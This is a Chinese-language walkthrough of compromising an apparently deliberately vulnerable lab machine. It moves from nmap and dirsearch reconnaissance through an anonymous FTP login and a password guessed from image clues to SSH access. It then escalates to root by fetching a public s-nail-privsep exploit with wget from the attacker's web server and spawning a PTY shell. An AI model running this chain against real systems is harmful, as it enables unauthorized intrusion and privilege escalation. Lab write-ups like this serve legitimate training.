信息收集
主机发现
扫描攻击机同网段存活主机。nmap 192.168.31.0/24 -Pn -T4
目标机ip:192.168.31.227
端口扫描
对目标机进行全面扫描。nmap 192.168.31.227 -A -p- -T4
开放了ftp、ssh、http服务,扫描结果重点告诉我们两个信息点:
-
ftp服务版本。vsftpd 3.0.3
-
http的目录:/robots.txt,/kingchad.html。
目录扫描
访问http服务。首页除了点题的gigachad图片,还有个小彩蛋,感兴趣的可以解密看看。
dirsearch -u http://192.168.31.227
扫出很多目录,筛选了一些可疑路径访问,没啥发现。有WordPress相关的目录,但是很遗憾这里没有通过WordPress来渗透的可能。前面nmap端口扫描时有两个路径,访问一下。
/robots。指向路径/kingchad.html。
/kingchad.html。图片文字翻译是:英国军情五处,军情六处吗,这里有黑客入侵我。
渗透
ftp弱口令
http服务没有收集到有用信息,转战ftp,根据前面端口扫描得到的信息ftp vsftpd 3.0.3,百度发现该ftp版本存在弱口令漏洞。
ftp 192.168.31.227
# 用户名和密码都是ftp
成功登录ftp服务器。进一步渗透,发现chadinfo文件。
将文件下载到本地get chadinfo
。提示用户名是chad,并且密码在/drippinchad.png中。
访问/drippinchad.png。图片文字翻译是:你怎么知道?这是我最喜欢的放松地点。
密码就是图片中景观地点,用ChatGTP或者百度,结果是:图像中突出的建筑物是少女塔(Kız Kulesi),位于土耳其伊斯坦布尔博斯普鲁斯海峡南部入口的一个小岛上。直接用Kız Kulesi尝试登录ssh,密码错误,搜一下英文名。
Maiden's Tower,多次尝试后得到密码是maidenstower。
顺利找到flag 1/2。
提权
find / -perm -u=s -type f 2>/dev/null
发现一个可利用的文件s-nail-privsep。s-nail是用于发送邮件的命令。
searchsploit找一下有没有可利用的exp,searchsploit s-nail
。
刚好有本地提权的exp,但是有版本要求,需要确认一下目标机s-nail的版本,s-nail -V
,符合exp的利用前提。
把exp放到目标机中。
# 攻击机
searchsploit -m 47172.py //将exp复制到本地
python3 -m http.server //exp同目录下开启一个简易http服务
#目标机
wget http://攻击机ip:port/47172.sh //下载exp
使用exp前确保有执行权限,./47172.sh
,等待提权成功。
如果提示提权失败,可以尝试写个循环while true;do ./47172.sh;done
。
得到一个交互式shell,执行以下命令。
python3 -c 'import pty;pty.spawn("/bin/bash")
get root flag🎆